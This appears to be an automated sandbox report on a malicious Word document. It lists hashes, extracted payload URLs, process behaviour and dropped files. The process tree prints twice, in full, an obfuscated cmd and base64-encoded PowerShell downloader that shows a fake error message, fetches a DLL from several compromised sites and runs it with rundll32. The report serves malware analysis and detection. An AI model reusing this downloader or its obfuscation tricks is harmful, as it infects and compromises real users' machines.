Analysis
-
max time kernel
140s -
max time network
134s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
11-02-2021 20:11
Behavioral task
behavioral1
Sample
e3e36943a883fd58040051eca25d8bc45e43b13335178d371496aa1a21cb925d.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
e3e36943a883fd58040051eca25d8bc45e43b13335178d371496aa1a21cb925d.doc
Resource
win10v20201028
General
-
Target
e3e36943a883fd58040051eca25d8bc45e43b13335178d371496aa1a21cb925d.doc
-
Size
167KB
-
MD5
638d1d539e13424a5c555bfcf025abad
-
SHA1
5d5878c2bd87669f6d1194ddfe120094a2590795
-
SHA256
e3e36943a883fd58040051eca25d8bc45e43b13335178d371496aa1a21cb925d
-
SHA512
b5b354f4fdbfb411d727b63f0d61a5dcff2d4936cd268b320fa27932e3f4feb54d65135855115272b09147ca3464a7cc28c3cb254359abb527c948a8b759e7ed
Malware Config
Extracted
http://dripsweet.com/wp-admin/gTiO/
http://jbsmediaventures.com/wp-content/V/
https://www.r3-tech.biz/wp-admin/VT/
http://yaginc.com/images/tk/
http://novo2.deussalveobrasil.com.br/tractor-parts-gh28c/9/
http://trekkingfestival.com/demo/C/
http://narmada.mykfn.com/app/DqKG1/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4076 3660 cmd.exe -
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 24 2180 powershell.exe 26 2180 powershell.exe 33 2180 powershell.exe 36 2180 powershell.exe 39 2180 powershell.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1884 rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2604 WINWORD.EXE 2604 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2180 powershell.exe 2180 powershell.exe 2180 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2180 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 2604 WINWORD.EXE 2604 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 2604 WINWORD.EXE 2604 WINWORD.EXE 2604 WINWORD.EXE 2604 WINWORD.EXE 2604 WINWORD.EXE 2604 WINWORD.EXE 2604 WINWORD.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exepowershell.exerundll32.exedescription pid process target process PID 4076 wrote to memory of 1332 4076 cmd.exe msg.exe PID 4076 wrote to memory of 1332 4076 cmd.exe msg.exe PID 4076 wrote to memory of 2180 4076 cmd.exe powershell.exe PID 4076 wrote to memory of 2180 4076 cmd.exe powershell.exe PID 2180 wrote to memory of 1332 2180 powershell.exe rundll32.exe PID 2180 wrote to memory of 1332 2180 powershell.exe rundll32.exe PID 1332 wrote to memory of 1884 1332 rundll32.exe rundll32.exe PID 1332 wrote to memory of 1884 1332 rundll32.exe rundll32.exe PID 1332 wrote to memory of 1884 1332 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e3e36943a883fd58040051eca25d8bc45e43b13335178d371496aa1a21cb925d.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABzAEUAVAAgACgAIgA4AHoAdwAiACsAIgBIACIAKQAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADMAfQB7ADUAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAE8AcgB5ACcALAAnAEUAYwB0ACcALAAnAFMAeQBTAHQAZQAnACwAJwBvAC4AZAAnACwAJwBtAC4AaQAnACwAJwBJAFIAJwApACAAIAApACAAOwBzAGUAVAAgACAAKAAnAEQAQwAnACsAJwB1AFIAJwApACAAIAAoACAAIABbAHQAeQBwAGUAXQAoACIAewAwAH0AewA4AH0AewA0AH0AewA5AH0AewAyAH0AewAxAH0AewAzAH0AewA2AH0AewA1AH0AewA3AH0AIgAgAC0ARgAgACcAUwB5AHMAJwAsACcARQBSACcALAAnAFMAJwAsACcAdgAnACwAJwAuAE4ARQBUACcALAAnAG8AaQBuAFQAbQBhACcALAAnAGkAYwBFAFAAJwAsACcATgBBAGcAZQByACcALAAnAHQARQBNACcALAAnAC4AJwApACAAKQAgADsAJABUAHQAZQAyAGEAdAAxAD0AJABLADYAMgBWACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABTADcAMABNADsAJABJADQAXwBKAD0AKAAnAFUAMAAnACsAJwA2AEkAJwApADsAIAAoACAAZwBlAHQALQB2AGEAUgBpAEEAQgBsAEUAIAAoACIAOABaAHcAIgArACIASAAiACkAIAAtAHYAQQBsAHUAZQBvAG4AbAAgACkAOgA6ACIAQwByAEUAQQBgAFQAZQBgAGQASQBSAGAAZQBjAFQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZwA3AGkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqADkAJwArACcAdwAnACkAKwAoACcAXwAnACsAJwBsAGcAJwArACcANwBpAFkAcwAxAHcAJwArACcAdQAnACkAKwAoACcAbgA1ACcAKwAnAGcANwBpACcAKQApACAAIAAtAEMAcgBFAFAATABhAEMARQAoAFsAQwBIAGEAUgBdADEAMAAzACsAWwBDAEgAYQBSAF0ANQA1ACsAWwBDAEgAYQBSAF0AMQAwADUAKQAsAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAEUAOAA2AFAAPQAoACcAVwAyACcAKwAnADIAVQAnACkAOwAgACAAKAAgACAASQB0AGUAbQAgACgAIgBWACIAKwAiAGEAUgBJAEEAQgBMACIAKwAiAGUAOgBEAEMAVQBSACIAKQAgACAAKQAuAFYAQQBsAHUARQA6ADoAIgBzAGUAYwB1AFIAYABJAFQAWQBQAFIAbwBgAFQATwBjAGAAbwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABFADUAOABDAD0AKAAoACcATQAnACsAJwA1ADAAJwApACsAJwBWACcAKQA7ACQASQB2AGYAdAB5AHAAdwAgAD0AIAAoACgAJwBJADQAJwArACcANQAnACkAKwAnAFEAJwApADsAJABaADAANwBJAD0AKAAoACcAVAAxACcAKwAnADEAJwApACsAJwBDACcAKQA7ACQASwBwAHoAZAA3AGMAZQA9ACQASABPAE0ARQArACgAKAAoACcAMQAwADkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqACcAKwAnADkAdwAnACkAKwAoACcAXwBsADEAMAA5AFkAcwAnACsAJwAxACcAKwAnAHcAJwApACsAJwB1AG4AJwArACcANQAxACcAKwAnADAAOQAnACkALgAiAHIARQBwAGAAbABhAEMARQAiACgAKABbAGMASABhAHIAXQA0ADkAKwBbAGMASABhAHIAXQA0ADgAKwBbAGMASABhAHIAXQA1ADcAKQAsAFsAUwBUAFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACsAJABJAHYAZgB0AHkAcAB3ACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABTADEANwBCAD0AKAAnAE8AJwArACgAJwA1ADIAJwArACcARAAnACkAKQA7ACQATwBjAHkAZQB4AHMAMAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFcAYwB5AGIAZwAxADcAPQAoACcAeAAnACsAJwAgAFsAJwArACgAJwAgACcAKwAnAHMAaAAnACkAKwAoACcAIAAnACsAJwBiADoALwAvACcAKQArACgAJwBkAHIAaQBwAHMAdwBlACcAKwAnAGUAdAAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGEAJwArACcAZABtAGkAbgAvAGcAJwArACcAVABpAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACsAJwAgAHMAaAAgAGIAOgAnACsAJwAvAC8AagAnACkAKwAoACcAYgBzAG0AZQAnACsAJwBkACcAKwAnAGkAJwApACsAKAAnAGEAJwArACcAdgBlAG4AJwApACsAKAAnAHQAdQByACcAKwAnAGUAcwAuAGMAbwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAvAFYAJwArACcALwAhAHgAJwArACcAIABbACcAKQArACcAIABzACcAKwAoACcAaAAnACsAJwAgAGIAJwApACsAJwBzACcAKwAoACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAHIAJwArACcAMwAtAHQAJwApACsAKAAnAGUAYwAnACsAJwBoACcAKQArACcALgBiACcAKwAoACcAaQB6ACcAKwAnAC8AJwApACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwAnACsAJwBWAFQALwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACkAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgA6AC8ALwB5AGEAJwArACcAZwBpACcAKQArACgAJwBuACcAKwAnAGMAJwArACcALgBjAG8AbQAvAGkAbQBhAGcAZQBzACcAKwAnAC8AdABrAC8AIQAnACsAJwB4ACAAWwAgACcAKQArACgAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAoACcALwBuAG8AdgAnACsAJwBvADIAJwArACcALgAnACkAKwAoACcAZABlACcAKwAnAHUAcwAnACsAJwBzAGEAbAB2ACcAKwAnAGUAbwBiAHIAYQBzAGkAJwApACsAKAAnAGwALgBjAG8AJwArACcAbQAnACkAKwAnAC4AYgAnACsAJwByACcAKwAoACcALwB0AHIAYQAnACsAJwBjAHQAbwAnACkAKwAnAHIALQAnACsAJwBwACcAKwAoACcAYQAnACsAJwByAHQAJwApACsAJwBzAC0AJwArACcAZwBoACcAKwAoACcAMgAnACsAJwA4AGMALwA5AC8AIQAnACkAKwAoACcAeAAgAFsAIAAnACsAJwBzACcAKQArACgAJwBoACAAJwArACcAYgA6AC8AJwApACsAKAAnAC8AdAByAGUAawBrACcAKwAnAGkAbgAnACkAKwAoACcAZwBmAGUAcwB0ACcAKwAnAGkAdgAnACsAJwBhAGwAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwBkACcAKwAnAGUAbQAnACsAJwBvAC8AJwArACcAQwAvACEAeAAgAFsAIABzACcAKQArACgAJwBoACAAYgA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAbgBhAHIAJwArACcAbQAnACkAKwAoACcAYQAnACsAJwBkAGEAJwArACcALgBtAHkAawBmACcAKQArACgAJwBuACcAKwAnAC4AYwBvACcAKQArACgAJwBtAC8AYQBwAHAALwAnACsAJwBEAHEASwAnACsAJwBHADEALwAnACkAKQAuACIAcgBlAGAAcABsAGAAQQBDAGUAIgAoACgAKAAnAHgAIAAnACsAJwBbACcAKQArACgAJwAgACcAKwAnAHMAaAAnACkAKwAnACAAYgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE8AYwB5AGUAeABzADAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAHQAIgAoACQAWQA3ADAAQQAgACsAIAAkAFQAdABlADIAYQB0ADEAIAArACAAJABLADEAOABWACkAOwAkAFYAMwAwAFkAPQAoACcAQQA3ACcAKwAnADkAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAYQB3ADEAOABxADUAIABpAG4AIAAkAFcAYwB5AGIAZwAxADcAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAFMAWQBzAFQARQBNAC4AbgBlAHQALgBXAGUAYgBjAEwAaQBlAE4AVAApAC4AIgBkAE8AdwBgAE4ATABgAE8AYQBEAEYAaQBgAGwARQAiACgAJABMAGEAdwAxADgAcQA1ACwAIAAkAEsAcAB6AGQANwBjAGUAKQA7ACQARAA1ADcARwA9ACgAJwBLADAAJwArACcAOQBYACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABLAHAAegBkADcAYwBlACkALgAiAGwAZQBgAE4AZwBgAFQASAAiACAALQBnAGUAIAA0ADgAOAAzADEAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASwBwAHoAZAA3AGMAZQAsACgAKAAnAEEAbgAnACsAJwB5AFMAJwApACsAKAAnAHQAJwArACcAcgBpACcAKQArACcAbgBnACcAKQAuACIAdABPAGAAcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQARwA0ADAAUwA9ACgAKAAnAFkANwAnACsAJwA4ACcAKQArACcATwAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMwA4AEEAPQAoACcARwA3ACcAKwAnADQAWAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANAA3AFEAPQAoACgAJwBaADgAJwArACcANQAnACkAKwAnAEgAJwApAA==1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -enc IABzAEUAVAAgACgAIgA4AHoAdwAiACsAIgBIACIAKQAgACgAIAAgAFsAdAB5AFAARQBdACgAIgB7ADIAfQB7ADQAfQB7ADMAfQB7ADUAfQB7ADEAfQB7ADAAfQAiAC0AZgAnAE8AcgB5ACcALAAnAEUAYwB0ACcALAAnAFMAeQBTAHQAZQAnACwAJwBvAC4AZAAnACwAJwBtAC4AaQAnACwAJwBJAFIAJwApACAAIAApACAAOwBzAGUAVAAgACAAKAAnAEQAQwAnACsAJwB1AFIAJwApACAAIAAoACAAIABbAHQAeQBwAGUAXQAoACIAewAwAH0AewA4AH0AewA0AH0AewA5AH0AewAyAH0AewAxAH0AewAzAH0AewA2AH0AewA1AH0AewA3AH0AIgAgAC0ARgAgACcAUwB5AHMAJwAsACcARQBSACcALAAnAFMAJwAsACcAdgAnACwAJwAuAE4ARQBUACcALAAnAG8AaQBuAFQAbQBhACcALAAnAGkAYwBFAFAAJwAsACcATgBBAGcAZQByACcALAAnAHQARQBNACcALAAnAC4AJwApACAAKQAgADsAJABUAHQAZQAyAGEAdAAxAD0AJABLADYAMgBWACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABTADcAMABNADsAJABJADQAXwBKAD0AKAAnAFUAMAAnACsAJwA2AEkAJwApADsAIAAoACAAZwBlAHQALQB2AGEAUgBpAEEAQgBsAEUAIAAoACIAOABaAHcAIgArACIASAAiACkAIAAtAHYAQQBsAHUAZQBvAG4AbAAgACkAOgA6ACIAQwByAEUAQQBgAFQAZQBgAGQASQBSAGAAZQBjAFQAYABvAHIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAZwA3AGkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqADkAJwArACcAdwAnACkAKwAoACcAXwAnACsAJwBsAGcAJwArACcANwBpAFkAcwAxAHcAJwArACcAdQAnACkAKwAoACcAbgA1ACcAKwAnAGcANwBpACcAKQApACAAIAAtAEMAcgBFAFAATABhAEMARQAoAFsAQwBIAGEAUgBdADEAMAAzACsAWwBDAEgAYQBSAF0ANQA1ACsAWwBDAEgAYQBSAF0AMQAwADUAKQAsAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAEUAOAA2AFAAPQAoACcAVwAyACcAKwAnADIAVQAnACkAOwAgACAAKAAgACAASQB0AGUAbQAgACgAIgBWACIAKwAiAGEAUgBJAEEAQgBMACIAKwAiAGUAOgBEAEMAVQBSACIAKQAgACAAKQAuAFYAQQBsAHUARQA6ADoAIgBzAGUAYwB1AFIAYABJAFQAWQBQAFIAbwBgAFQATwBjAGAAbwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABFADUAOABDAD0AKAAoACcATQAnACsAJwA1ADAAJwApACsAJwBWACcAKQA7ACQASQB2AGYAdAB5AHAAdwAgAD0AIAAoACgAJwBJADQAJwArACcANQAnACkAKwAnAFEAJwApADsAJABaADAANwBJAD0AKAAoACcAVAAxACcAKwAnADEAJwApACsAJwBDACcAKQA7ACQASwBwAHoAZAA3AGMAZQA9ACQASABPAE0ARQArACgAKAAoACcAMQAwADkAJwArACcARQAnACkAKwAnADgAJwArACgAJwBqACcAKwAnADkAdwAnACkAKwAoACcAXwBsADEAMAA5AFkAcwAnACsAJwAxACcAKwAnAHcAJwApACsAJwB1AG4AJwArACcANQAxACcAKwAnADAAOQAnACkALgAiAHIARQBwAGAAbABhAEMARQAiACgAKABbAGMASABhAHIAXQA0ADkAKwBbAGMASABhAHIAXQA0ADgAKwBbAGMASABhAHIAXQA1ADcAKQAsAFsAUwBUAFIASQBuAEcAXQBbAGMASABhAHIAXQA5ADIAKQApACsAJABJAHYAZgB0AHkAcAB3ACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABTADEANwBCAD0AKAAnAE8AJwArACgAJwA1ADIAJwArACcARAAnACkAKQA7ACQATwBjAHkAZQB4AHMAMAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFcAYwB5AGIAZwAxADcAPQAoACcAeAAnACsAJwAgAFsAJwArACgAJwAgACcAKwAnAHMAaAAnACkAKwAoACcAIAAnACsAJwBiADoALwAvACcAKQArACgAJwBkAHIAaQBwAHMAdwBlACcAKwAnAGUAdAAnACsAJwAuAGMAJwArACcAbwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtAGEAJwArACcAZABtAGkAbgAvAGcAJwArACcAVABpAE8ALwAnACsAJwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACsAJwAgAHMAaAAgAGIAOgAnACsAJwAvAC8AagAnACkAKwAoACcAYgBzAG0AZQAnACsAJwBkACcAKwAnAGkAJwApACsAKAAnAGEAJwArACcAdgBlAG4AJwApACsAKAAnAHQAdQByACcAKwAnAGUAcwAuAGMAbwBtAC8AdwAnACsAJwBwACcAKwAnAC0AYwBvAG4AdABlAG4AdAAvAFYAJwArACcALwAhAHgAJwArACcAIABbACcAKQArACcAIABzACcAKwAoACcAaAAnACsAJwAgAGIAJwApACsAJwBzACcAKwAoACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAHIAJwArACcAMwAtAHQAJwApACsAKAAnAGUAYwAnACsAJwBoACcAKQArACcALgBiACcAKwAoACcAaQB6ACcAKwAnAC8AJwApACsAKAAnAHcAJwArACcAcAAtAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwAnACsAJwBWAFQALwAhACcAKQArACgAJwB4ACcAKwAnACAAWwAnACkAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgA6AC8ALwB5AGEAJwArACcAZwBpACcAKQArACgAJwBuACcAKwAnAGMAJwArACcALgBjAG8AbQAvAGkAbQBhAGcAZQBzACcAKwAnAC8AdABrAC8AIQAnACsAJwB4ACAAWwAgACcAKQArACgAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAoACcALwBuAG8AdgAnACsAJwBvADIAJwArACcALgAnACkAKwAoACcAZABlACcAKwAnAHUAcwAnACsAJwBzAGEAbAB2ACcAKwAnAGUAbwBiAHIAYQBzAGkAJwApACsAKAAnAGwALgBjAG8AJwArACcAbQAnACkAKwAnAC4AYgAnACsAJwByACcAKwAoACcALwB0AHIAYQAnACsAJwBjAHQAbwAnACkAKwAnAHIALQAnACsAJwBwACcAKwAoACcAYQAnACsAJwByAHQAJwApACsAJwBzAC0AJwArACcAZwBoACcAKwAoACcAMgAnACsAJwA4AGMALwA5AC8AIQAnACkAKwAoACcAeAAgAFsAIAAnACsAJwBzACcAKQArACgAJwBoACAAJwArACcAYgA6AC8AJwApACsAKAAnAC8AdAByAGUAawBrACcAKwAnAGkAbgAnACkAKwAoACcAZwBmAGUAcwB0ACcAKwAnAGkAdgAnACsAJwBhAGwAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwBkACcAKwAnAGUAbQAnACsAJwBvAC8AJwArACcAQwAvACEAeAAgAFsAIABzACcAKQArACgAJwBoACAAYgA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAbgBhAHIAJwArACcAbQAnACkAKwAoACcAYQAnACsAJwBkAGEAJwArACcALgBtAHkAawBmACcAKQArACgAJwBuACcAKwAnAC4AYwBvACcAKQArACgAJwBtAC8AYQBwAHAALwAnACsAJwBEAHEASwAnACsAJwBHADEALwAnACkAKQAuACIAcgBlAGAAcABsAGAAQQBDAGUAIgAoACgAKAAnAHgAIAAnACsAJwBbACcAKQArACgAJwAgACcAKwAnAHMAaAAnACkAKwAnACAAYgAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE8AYwB5AGUAeABzADAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAHQAIgAoACQAWQA3ADAAQQAgACsAIAAkAFQAdABlADIAYQB0ADEAIAArACAAJABLADEAOABWACkAOwAkAFYAMwAwAFkAPQAoACcAQQA3ACcAKwAnADkAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEwAYQB3ADEAOABxADUAIABpAG4AIAAkAFcAYwB5AGIAZwAxADcAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAFMAWQBzAFQARQBNAC4AbgBlAHQALgBXAGUAYgBjAEwAaQBlAE4AVAApAC4AIgBkAE8AdwBgAE4ATABgAE8AYQBEAEYAaQBgAGwARQAiACgAJABMAGEAdwAxADgAcQA1ACwAIAAkAEsAcAB6AGQANwBjAGUAKQA7ACQARAA1ADcARwA9ACgAJwBLADAAJwArACcAOQBYACcAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABLAHAAegBkADcAYwBlACkALgAiAGwAZQBgAE4AZwBgAFQASAAiACAALQBnAGUAIAA0ADgAOAAzADEAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAJwArACcAMwAyACcAKQAgACQASwBwAHoAZAA3AGMAZQAsACgAKAAnAEEAbgAnACsAJwB5AFMAJwApACsAKAAnAHQAJwArACcAcgBpACcAKQArACcAbgBnACcAKQAuACIAdABPAGAAcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQARwA0ADAAUwA9ACgAKAAnAFkANwAnACsAJwA4ACcAKQArACcATwAnACkAOwBiAHIAZQBhAGsAOwAkAEsAMwA4AEEAPQAoACcARwA3ACcAKwAnADQAWAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEANAA3AFEAPQAoACgAJwBaADgAJwArACcANQAnACkAKwAnAEgAJwApAA==2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll,AnyString3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\E8j9w_l\Ys1wun5\I45Q.dll,AnyString4⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\E8j9w_l\Ys1wun5\I45Q.dllMD5
3d2fd352dcc7a8ac966acb97962b0a99
SHA13da986ade7db698139ca46ca96f7d1e0aa3318f4
SHA2569b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83
SHA51282f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211
-
\Users\Admin\E8j9w_l\Ys1wun5\I45Q.dllMD5
3d2fd352dcc7a8ac966acb97962b0a99
SHA13da986ade7db698139ca46ca96f7d1e0aa3318f4
SHA2569b675d8282512237cfdfcec7918290313b34959190f64c0deb540d444b6b0c83
SHA51282f8f0ecd65426494fd7dd6673b117cf73babe55b87c15904d9cde21fc124fb36815623c49bf5e81e8433d628046a3de0b5f3508510747c4f65d73f0a7378211
-
memory/1332-7-0x0000000000000000-mapping.dmp
-
memory/1332-15-0x0000000000000000-mapping.dmp
-
memory/1884-17-0x0000000000000000-mapping.dmp
-
memory/2180-14-0x0000021ACC296000-0x0000021ACC298000-memory.dmpFilesize
8KB
-
memory/2180-8-0x0000000000000000-mapping.dmp
-
memory/2180-9-0x00007FF88BCB0000-0x00007FF88C69C000-memory.dmpFilesize
9.9MB
-
memory/2180-10-0x0000021AB4140000-0x0000021AB4141000-memory.dmpFilesize
4KB
-
memory/2180-11-0x0000021ACC290000-0x0000021ACC292000-memory.dmpFilesize
8KB
-
memory/2180-12-0x0000021ACC293000-0x0000021ACC295000-memory.dmpFilesize
8KB
-
memory/2180-13-0x0000021ACC520000-0x0000021ACC521000-memory.dmpFilesize
4KB
-
memory/2604-2-0x00007FF8731B0000-0x00007FF8731C0000-memory.dmpFilesize
64KB
-
memory/2604-6-0x00000243359F0000-0x0000024336027000-memory.dmpFilesize
6.2MB
-
memory/2604-5-0x00007FF8731B0000-0x00007FF8731C0000-memory.dmpFilesize
64KB
-
memory/2604-4-0x00007FF8731B0000-0x00007FF8731C0000-memory.dmpFilesize
64KB
-
memory/2604-3-0x00007FF8731B0000-0x00007FF8731C0000-memory.dmpFilesize
64KB